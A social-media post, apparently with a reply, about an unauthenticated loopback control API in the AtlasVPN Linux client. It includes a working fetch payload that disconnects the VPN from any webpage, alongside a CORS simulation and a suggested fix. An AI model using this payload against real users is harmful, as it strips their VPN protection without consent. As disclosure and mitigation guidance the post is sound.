Find of the day - someone dropped an AtlasVPN #0day on Reddit. The AtlasVPN daemon on Linux runs an HTTP server to accept CLI commands, it binds to 127.0.0.1:8076 by default.
What's hilarious is that it accepts commands without ANY authentication - so if you open a malicious webpage, that webpage can fire a POST to 127.0.0.1:8076/connection/stop and instantly disconnect your VPN.
Utter garbage.
Source: https://www.reddit.com/r/cybersecurity/comments/167f16e/atlasvpn_linux_client_103_remote_disconnect/
Proof below - used AtlasVPN's latest Linux client, version 1.0.3.
Really great question in the comments - how does this exploit bypass CORS?
The request to the AtlasVPN daemon meets the definition of a "simple request" - for legacy/compatibility reasons, servers don't have to "opt in" to receive requests that look like form submissions. :')
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests
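To make the "simple request" point concrete, here is an added example (written for this page, not code from the thread or from AtlasVPN) that models the browser's CORS decision and the daemon's handler in plain Node.js. The port 8076 and the /connection/stop path come from the post; the attacker origin, the token value and the header name X-AtlasVPN-Token are hypothetical names chosen for the example, and the hardened handler is one possible mitigation, not the vendor's.

```javascript
// Added example: why a CORS "simple request" reaches an unauthenticated loopback daemon, and
// how a custom header plus an Origin check closes the hole. Port and path are from the post;
// the origin, token and X-AtlasVPN-Token header name are hypothetical, for this example only.

const SAFELISTED_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFELISTED_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded", "multipart/form-data", "text/plain",
]);

function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? undefined : headers[key];
}

// True when a browser sends the cross-origin request WITHOUT a preflight, i.e. the method and
// every author-set header are CORS-safelisted (Fetch standard; value-length limits omitted).
// For such a request the server is never asked whether it wants to receive it.
function isSimpleRequest(method, headers) {
  if (!SAFELISTED_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const lname = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lname)) return false;
    if (lname === "content-type") {
      const essence = value.split(";")[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(essence)) return false;
    }
  }
  return true;
}

// What a malicious page sends. In the page this is literally:
//   fetch("http://127.0.0.1:8076/connection/stop", { method: "POST", mode: "no-cors",
//         headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: "" });
// mode:"no-cors" only hides the response from the page; the POST is still delivered.
const ATTACKER_ORIGIN = "https://evil.example"; // constructed origin for the example
const attackerRequest = {
  method: "POST",
  path: "/connection/stop",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: "",
};

// Handler as the post describes it: any POST to /connection/stop is honoured, no auth.
function vulnerableHandler(req) {
  if (req.method === "POST" && req.path === "/connection/stop") return { status: 200, action: "disconnect" };
  return { status: 404, action: null };
}

// Example mitigation (not AtlasVPN's): refuse anything carrying a browser-set Origin header,
// and require a per-install secret in a custom header. The custom header makes a page's
// request non-simple, so the browser preflights it; because the daemon never answers with
// Access-Control-Allow-*, the real request is never sent at all.
const LOCAL_TOKEN = "example-token-not-real"; // hypothetical; in practice random, 0600 file
function hardenedHandler(req) {
  if (getHeader(req.headers, "Origin") !== undefined) return { status: 403, action: null };
  if (getHeader(req.headers, "X-AtlasVPN-Token") !== LOCAL_TOKEN) return { status: 401, action: null };
  return vulnerableHandler(req);
}

// The local CLI is not a browser: no Origin header, and it can read the token file.
const cliRequest = { method: "POST", path: "/connection/stop", headers: { "X-AtlasVPN-Token": LOCAL_TOKEN }, body: "" };

// Minimal model of the browser: attach Origin, send simple requests straight through, preflight
// everything else with OPTIONS and drop it unless the response grants the origin.
function simulateBrowser(origin, req, handler) {
  if (!isSimpleRequest(req.method, req.headers)) {
    const preflight = handler({ method: "OPTIONS", path: req.path, headers: { Origin: origin }, body: "" });
    if (preflight.allowOrigin !== "*" && preflight.allowOrigin !== origin) {
      return { status: null, action: null, blocked: "preflight" };
    }
  }
  return handler({ ...req, headers: { ...req.headers, Origin: origin } });
}

console.log("vulnerable daemon:", simulateBrowser(ATTACKER_ORIGIN, attackerRequest, vulnerableHandler));
console.log("hardened daemon:  ", simulateBrowser(ATTACKER_ORIGIN, attackerRequest, hardenedHandler));
console.log("local CLI:        ", hardenedHandler(cliRequest));
```

The takeaway for anyone shipping a loopback control API: binding to 127.0.0.1 is not an authentication boundary, because every browser on the machine is also "local". Either require a credential the page cannot obtain (a custom header forces a preflight the daemon can simply refuse to answer) or check Origin/Host explicitly; ideally both.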
@tweedge CORS is just a suggestion anyway. The client has to choose to enforce it.